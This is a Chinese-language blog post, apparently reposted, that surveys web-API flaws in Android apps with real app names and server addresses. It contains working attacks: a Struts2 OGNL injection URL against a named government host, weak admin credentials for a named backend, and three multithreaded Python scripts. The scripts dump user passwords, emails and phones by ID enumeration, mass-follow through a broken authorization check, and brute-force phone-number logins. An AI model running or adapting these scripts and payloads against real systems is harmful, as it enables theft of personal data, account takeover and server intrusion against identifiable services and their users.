Android应用安全不仅包括客户端的安全,也包括web接口的安全。移动App中的Web接口安全主要分为以下几块:
1.SQL注入漏洞
这是一个不能再常见的漏洞类型了,由于App的特性,开发人员认为使用App时无法获取到详细URL等信息,所以忽视了App防注入的编写。
例如:
糗事百科某处SQL注入可导致1500w用户信息泄露
全峰快递注入漏洞,可直接建服务器用户,各种订单用户数据泄露
永辉超市Appsql注入导致超市及用户信息泄露
社交App“小湿妹”某处洞洞,数据库沦陷
提升逼格的App“交换”数据库沦陷,用户信息泄露
这些漏洞都是由于App开发中忽视了接口可能存在SQL注入问题,其中也包括POST注入,GET注入,COOKIE注入等等。
拿糗事百科注入详细举例:
在查询用户详细信息时抓包,包内容如下:
GET /user/6122886/detail?rqcnt=12&r=dec363d71423481245949 HTTP/1.1 User-Agent: qiushibalke_6.2.0_WIFI_auto_7 Source: android_6.2.0 Model: Xiaomi/cancro_wc_lte/cancro:4.4.4/KTU84P/V6.3.3.0.KXDCNBL:user/release-keys Qbtoken: 929efcfa9875f584f9f4db17343d16d7b1ec404b Uuid: IMEI_2af2c2beee1dbd00d3436cffdec363d7 Deviceidinfo: {"DEVICEID":"99000566573203","RANDOM":"","ANDROID_ID":"2e6990c574abdd57","SIMNO":"89860313100285780111'","IMSI":"460031219452851","SERIAL":"5d999491","MAC":"0c:1d:af:db:07:9c","SDK_INT":19} Host: nearby.qiushibaike.com Connection: Keep-Alive Accept-Encoding: gzip
其中Qbtoken参数存在注入。
2.任意用户注册漏洞
此类漏洞并不危害到用户信息泄露,但是别有用心的黑客可能会利用此漏洞注册任意手机号码,并利用此注册账号去社工号码主人的朋友或者家人。
漏洞案例:
App“tataufo”某处漏洞可修改任意用户密码
App“约饭”任意用户注册
App“楼楼”任意用户注册
任意用户注册漏洞中大部分是由于验证码机制不健全和注册过程验证不严谨,其中App“约饭”任意用户注册时,发送注册请求后直接返回了验证码值。
而App“楼楼”任意用户注册中,注册流程分为四个步骤
(1).注册用户,填写手机号,发送接收验证码请求。
(2).接收验证码,并填写。
(3).填写并验证验证码,进入填写资料步骤。
(4).填写用户资料,完成注册。
而这里在第四个步骤中出现了问题,前三步正常操作,在第四步时将资料中的号码改为任意手机号即能实现任意用户注册。
3.用户信息泄露
这种类型的漏洞多在用户资料查阅处存在,由于编写不严谨,在查询用户资料时会返回用户隐私信息,如账号邮箱,手机,密码等。
如:
App“叽友”泄露用户信息
Duang~App“小柚”用户信息泄露附验证脚本(密码,邮箱,手机号)
糗事百科某处泄露用户信息
拿App“小柚”举例
访问用户资料直接返回一些敏感信息,密码,邮箱,手机号
写个Python脚本来dump用户信息
#!/usr/bin/env python # _*_ coding: utf-8 _*_# author=Hydra_Tc# create=20150227 import osimport jsonimport randomimport requestsimport threadpool as tp def baopo(): flag = 0 userid = 0 while True: flag += 1 userid += 1 data = { 'userid' : userid,} api_url = 'http://App.hixiaoyou.com/User/Me/getuserinfo' my_string = "userid" try: print '[%s] Test Userid: %s' % (flag, userid) req = requests.post(api_url, data=data, timeout=5) req_id = json.loads(req.content)['userid'] req_mail = json.loads(req.content)['email'] req_mobile = json.loads(req.content)['mobile'] req_qq = json.loads(req.content)['QQ'] req_pass = json.loads(req.content)['password'] except: req_status = 0 if my_string in req.json(): success_f = open('./success_user1.txt', 'a+') success_f.write('%s--%s--%s--%s--%s\n'%(req_id,req_qq,req_mobile,req_mail,req_pass)) success_f.close() if __name__ == '__main__': baopo() pool = tp.ThreadPool(100) reqs = tp.makeRequests(baopo) [pool.putRequest(req) for req in reqs] pool.wait()
结果如下
4.框架问题(st2等)
这个并不多但也不容忽视
国家统计局手机网站新闻管理系统两处漏洞
App“将爱”某漏洞可致服务器沦陷,泄露用户信息
国家统计局手机新闻管理系统漏洞如下:
http://219.235.129.108:8080/NewManager/admin/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
5.后台弱口令
由于App站点URL信息并不是很明显,所以管理在设置后台路径和密码方面也显得比较随意
如:
北京市地铁站新闻后台管理系统沦陷
抓包得到
往上跨目录得到
http://119.254.65.181/SubwayManagement/和http://119.254.65.181/两个后台系统,前者存在弱口令admin admin 和 admin beijingditieAppadmin
6.越权漏洞
这个漏洞出现率仅次于SQL注入
App“逗萌”某处设计不当(附验证脚本)
社交App“足记”漏洞打包
App“tataufo”某处漏洞可修改任意用户密码
拿App“逗萌”某处设计不当为例
在App中对用户添加关注处没有任何验证
POST /HC_AppClient/client-method/followUser.json HTTP/1.1 Content-Length: 39 Content-Type: Application/x-www-form-urlencoded Host: 115.29.5.49:80 Connection: Keep-Alive User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4) fromUserId=14004049&toUserId=1398055700
写了个脚本开始刷粉丝
1 #!/usr/bin/env python # _*_ coding: utf-8 _*_ 2 # author=Hydra_Tc 3 # create=20150306 4 5 import os 6 import json 7 import random 8 import requests 9 import threadpool as tp10 11 def baopo():12 flag = 113 fromUserId = 1398055614 while True:15 flag += 116 fromUserId += 117 data = { 'fromUserId' : fromUserId, 'toUserId' : '13980556',}18 api_url = 'http://115.29.5.49/HC_APPClient/client-method/followUser.json'19 my_string = "body"20 try:21 print '[%s] Test Userid: %s' % (flag, fromUserId)22 req = requests.post(api_url, data=data, timeout=5)23 except:24 req_status = 025 if my_string in req.json():26 success_f = open('./success_user1.txt', 'a+')27 success_f.write('%s\n'%(fromUserId))28 success_f.close()29 30 if __name__ == '__main__':31 baopo()32 pool = tp.ThreadPool(100)33 reqs = tp.makeRequests(baopo)34 [pool.putRequest(req) for req in reqs]35 pool.wait()
7.接口未限制导致撞库
其实这个我也是看到蘑菇牛发的没拍漏洞才开始注意此类型漏洞的,运气还算不错,两三天就找到个同类型的。
App“疯拍”两处漏洞打包,附验证脚本
疯拍存在两处漏洞,此处只举例接口未限制导致撞库。
我用一个未注册手机号登陆返回提示:
{ "success":false,"error":"\u8be5\u53f7\u7801\u5c1a\u672a\u6ce8\u518c\uff0c\u8bf7\u5148\u6ce8\u518c"}{ "success":false,"error":"该号码尚未注册,请先注册"}
提示尚未注册,用注册的用户登陆。
若密码错误,则会提示
{ "success":false,"error":"\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3"}{ "success":false,"error":"密码错误,再仔细想想"}
若密码正确
{ "success":true,"data":{ "data":{ "ucookie":"19151821c062f8a0252dc3a951940b8dc5a238188447a260b145e1e40fc3d48d9","username":"1234566666","avatar":"","level":0,"score":0,"setting":"{}","uid":16942,"nickname":"1234566666","t":1424918536},"expire":false}}
此处内容包含cookie,等相关信息。那么我们在蘑菇的脚本上稍微加一些改动即可实现爆破。
脚本如下,加了注释
1 #!/usr/bin/env python # _*_ coding: utf-8 _*_ 2 # author=Hydra_Tc 3 # create=20150224S 4 5 import json 6 import random 7 import requests 8 import threadpool as tp 9 10 def _burp(mobile): # 验证密码是否正确11 for password in ['qwertyu','123456', '123456789', '000000', mobile,'1234567','12345678','1234567890']: # 弱口令密码12 api_url = 'http://aifengpai.com/api/user/login' # 登陆接口13 data = { 'mobile': mobile,14 'did':'c71c53fa20c38d4a14ae8245bac9bb99',15 'password': password,} # 登陆参数,这里简化了,去除了不必要的参数16 try:17 print '[*] Burp mobile: %s' % mobile18 req = requests.post(api_url, data=data, timeout=5) # requests模块的post请求19 except:20 continue21 try:22 success = json.loads(req.content)['data']23 burp_success = open('./fengpai_account.txt', 'a+') # 随机成功后生成该txt,并写成功数据24 burp_success.write('%s:::%s\n'%(mobile, password))25 burp_success.close()26 print success27 return success28 except:29 success = 030 print '[-] Burp False'31 continue32 33 def _status(args): # 判断手机号是否注册34 flag = 035 list = "0123456789" 36 sa = []37 for i in range(8): #长度8,改了一下蘑菇牛的范围写法,自身测试感觉测试速度稍微加快了点38 sa.Append(random.choice(list))39 while True:40 flag += 141 account_test = random.choice(['138','130','133','135','138','139','150','152','155','159','180','181','182','185','187','189'])\ # 手机号前几位42 +''.join(sa)43 data = { 'mobile': account_test,44 'did':'c71c53fa20c38d4a14ae8245bac9bb99',45 'password': 'jhjhksd'}46 api_url = 'http://aifengpai.com/api/user/login'47 try:48 print '[%s] Test account: %s' % (flag, account_test)49 req = requests.post(api_url, data=data, timeout=3)50 req_status = json.loads(req.content)['error'] # 提取response里error处内容51 except:52 req_status = 053 if req_status == u'\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3': #两值相等则存在有该账号54 success_f = open('./fp_phone.txt', 'a+')55 success_f.write('%s\n'%account_test)56 success_f.close()57 _burp(account_test)58 print '\n[OK] account: %s\n' % account_test59 60 if __name__ == '__main__':61 args = []62 for i in range(30):63 args.Append(args) 64 pool = tp.ThreadPool(30)65 reqs = tp.makeRequests(_status, args)66 [pool.putRequest(req) for req in reqs]67 pool.wait()
因为该App并没有像美拍那样拥有很多用户所以爆破起来有点难,所以我在测试的时候把,测试范围函数里的list改为了改了下蘑菇牛的随机数生成方式。
list = "8"
手机前三位改为了
account_test = random.choice(['138'])\ # 手机号前几位
进行爆破结果如下这样只会生成13888888888(这个号码提交之前测试时候注册过)
本文转载自 DyckEye
原文链接: